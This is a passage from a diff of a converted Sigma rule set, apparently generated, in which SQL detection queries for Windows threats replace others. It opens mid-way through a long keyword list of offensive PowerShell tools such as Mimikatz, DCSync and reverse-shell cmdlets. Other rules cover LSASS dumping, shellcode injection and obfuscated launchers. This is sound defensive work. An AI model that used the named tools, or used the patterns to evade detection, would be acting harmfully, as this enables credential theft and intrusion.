'\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText 
LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\'))))" ], - "filename": 
"proc_access_win_direct_syscall_ntopenprocess.yml" + "filename": "posh_ps_malicious_commandlets.yml" }, { - "title": "SysmonEnte Usage", - "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", - "status": "experimental", - "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Credential Prompt", + "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "status": "test", + "description": "Detects PowerShell calling a credential prompt", + "author": "John Lambert (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.credential_access", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" ], - "filename": "proc_access_win_hack_sysmonente.yml" + "filename": "posh_ps_prompt_credentials.yml" }, { - "title": "Suspicious LSASS Access Via MalSecLogon", - "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", - "status": "experimental", - "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", - "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", + "title": "Request A Single Ticket via PowerShell", + "id": 
"a861d835-af37-4930-bcd6-5b178bfb54df", + "status": "test", + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" ], - "filename": "proc_access_win_susp_seclogon.yml" + "filename": "posh_ps_request_kerberos_ticket.yml" }, { - "title": "Potential Svchost Memory Access", - "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", + "id": "e54f5149-6ba3-49cf-b153-070d24679126", "status": "experimental", - "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", - "author": "Tim Burrell", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE 
'%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "proc_access_win_invoke_phantom.yml" + "filename": "posh_ps_invoke_obfuscation_via_var.yml" }, { - "title": "Lsass Memory Dump via Comsvcs DLL", - "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", - "status": "test", - "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", + "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" ], - "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + "filename": "posh_ps_invoke_obfuscation_stdin.yml" }, { - "title": "UAC Bypass Using WOW64 Logger DLL Hijack", - "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", + "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "proc_access_win_uac_bypass_wow64_logger.yml" + "filename": "posh_ps_invoke_obfuscation_var.yml" }, { - "title": "Potential Shellcode Injection", - "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "title": "Disable Powershell Command History", + "id": "602f5669-6927-4688-84db-0d4b7afb2150", "status": "experimental", - "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", - "author": "Bhabesh 
Raj", + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", + "author": "Ali Alwashali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1070.003" ], "falsepositives": [ - "Unknown" + "Legitimate script that disables the command history" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE 
'%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" ], - "filename": "proc_access_win_shellcode_inject_msf_empire.yml" + "filename": "posh_ps_disable_psreadline_command_history.yml" }, { - "title": "CMSTP Execution Process Access", - "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", + "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218.003", + "attack.t1027", "attack.execution", - "attack.t1559.001", - "attack.g0069", - "attack.g0080", - "car.2019-04-001" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%cmlua.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP 
'.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "proc_access_win_cmstp_execution_by_access.yml" + "filename": "posh_ps_invoke_obfuscation_clip.yml" }, { - "title": "Credential Dumping Tools Accessing LSASS Memory", - "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", - "status": "experimental", - "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", - "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", + "title": "Create Volume Shadow Copy with Powershell", + "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "status": "test", + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002", - "car.2019-04-004" + "attack.t1003.003" ], "falsepositives": [ - "Likely" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 
'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE 
